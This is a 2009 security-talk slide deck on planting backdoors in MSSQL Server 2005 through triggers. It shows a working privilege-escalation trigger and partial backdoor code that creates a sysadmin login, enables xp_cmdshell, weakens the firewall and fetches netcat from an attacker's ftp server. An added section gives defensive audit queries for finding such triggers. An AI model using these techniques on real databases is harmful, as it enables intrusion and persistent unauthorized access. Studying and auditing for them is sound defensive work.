MSSQL SERVER 2005 BACKDOOR
Duong Ngo
October 14, 2009

POST-EXPLOITATION
- Got access to an MSSQL box? (SQL injection, brute force…)
- Privileges: sa / dbo / normal user
- Got all the data
- Now what's next?

Backdoors
- Provide easier access to the compromised box in the future
- Types of backdoors: OS backdoors (rootkits), web server backdoors (PHPshell, CGITelnet..)
- So how about a database backdoor? YES!

SQL Server 2005 Backdoor
We'll create a backdoor based on a SQL Server trigger. What's a trigger?

Database Trigger
- A special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..)
- A trigger executes under the security context of whoever caused it to fire!

EXAMPLE – Create trigger
Context: normal user with CREATE TRIGGER permission:

    -- The body runs with the rights of whoever fires the trigger, not its author
    CREATE TRIGGER trg_gain_privilege
    ON tblCustomers
    FOR INSERT, DELETE, UPDATE
    AS
    EXEC sp_addsrvrolemember @loginame = 'Hacker', @rolename = N'sysadmin'

EXAMPLE – Trigger got fired
Context: sa (server admin)

    sa> DELETE FROM tblCustomers

RESULT?? User "Hacker" now becomes sysadmin.

What can we do with that?
- Privilege escalation: normal user -> higher role
- Database backdoor

SQLServer Backdoor features:
- Execute subsequent commands if the current user is 'sa'
- Enable xp_cmdshell
- Create a new login 'backdoor' and add it to the sysadmin server role.
- Disable firewall notification mode
- Add ftp to the allowed programs list
- Get netcat from the attacker's ftp server
- Create a directory 'Backdoor_activated' on the attacker's ftp server to let the attacker know whenever the backdoor has been started.
- Open netcat in listen mode attached to the SQL command-line client Osql.

Our Backdoor's Code

    CREATE TRIGGER trg_backdoor
    ON DATABASE
    FOR DDL_DATABASE_LEVEL_EVENTS
    AS
    BEGIN
    DECLARE @cur_user varchar(200)
    ……
    CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#';
    EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename = N'sysadmin'
    -- disable firewall notification mode
    EXEC master..xp_cmdshell 'netsh firewall set notifications disable'
    …..

Why DDL_DATABASE_LEVEL_EVENTS
Because it consists of all the events below:
- CREATE_TABLE, ALTER_TABLE, DROP_TABLE
- CREATE_VIEW, ALTER_VIEW, DROP_VIEW
- CREATE_SYNONYM, DROP_SYNONYM
- CREATE_FUNCTION, ALTER_FUNCTION, DROP_FUNCTION
- CREATE_PROCEDURE, ALTER_PROCEDURE, DROP_PROCEDURE
- CREATE_TRIGGER, ALTER_TRIGGER, DROP_TRIGGER
- CREATE_EVENT_NOTIFICATION, DROP_EVENT_NOTIFICATION
- ….

Our Backdoor's Code (cont)

    -- save ftp commands to an external file
    SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
    …..
    -- execute ftp with commands loaded from the file we created
    SET @cmd = 'ftp -s:' + @cmdfile
    EXEC master..xp_cmdshell @cmd, NO_OUTPUT
    ……
    -- after getting netcat, add netcat to the firewall's allowedprogram list
    SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\' + @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'

Thank You for listening!!
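
A defender's audit for the trigger backdoor described in these slides, as an added example that is not part of the original deck. It uses only SQL Server's own catalog views; the search strings are the calls the slides' code relies on, and the login running it is assumed to be able to view trigger definitions.

```sql
-- 1. Triggers in the current database that are database-scoped (DDL)
--    or whose body contains the calls the slides' backdoor depends on.
SELECT  t.name              AS trigger_name,
        t.parent_class_desc AS scope,          -- DATABASE = DDL trigger
        CASE WHEN t.parent_class = 1
             THEN OBJECT_NAME(t.parent_id) END AS parent_table,
        t.create_date,
        t.modify_date,
        t.is_disabled,
        m.definition                           -- NULL when WITH ENCRYPTION
FROM    sys.triggers    AS t
JOIN    sys.sql_modules AS m ON m.object_id = t.object_id
WHERE   t.is_ms_shipped = 0
  AND ( t.parent_class = 0                     -- every ON DATABASE trigger
     OR m.definition IS NULL                   -- encrypted body: review by hand
     OR m.definition LIKE '%xp[_]cmdshell%'
     OR m.definition LIKE '%sp[_]addsrvrolemember%'
     OR m.definition LIKE '%CREATE LOGIN%'
     OR m.definition LIKE '%netsh%' )
ORDER BY t.modify_date DESC;

-- 2. Is xp_cmdshell currently enabled? (the backdoor turns it on)
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name = 'xp_cmdshell';

-- 3. Who holds sysadmin, newest first? An unexpected recent login
--    is what both trigger examples in the slides would leave behind.
SELECT  p.name, p.type_desc, p.create_date, p.modify_date
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS p ON p.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin'
ORDER BY p.create_date DESC;
```

Query 1 is per database, so run it in each user database; on a case-sensitive collation the LIKE filters match only the casing shown. Server-scoped triggers are listed separately in sys.server_triggers and sys.server_sql_modules.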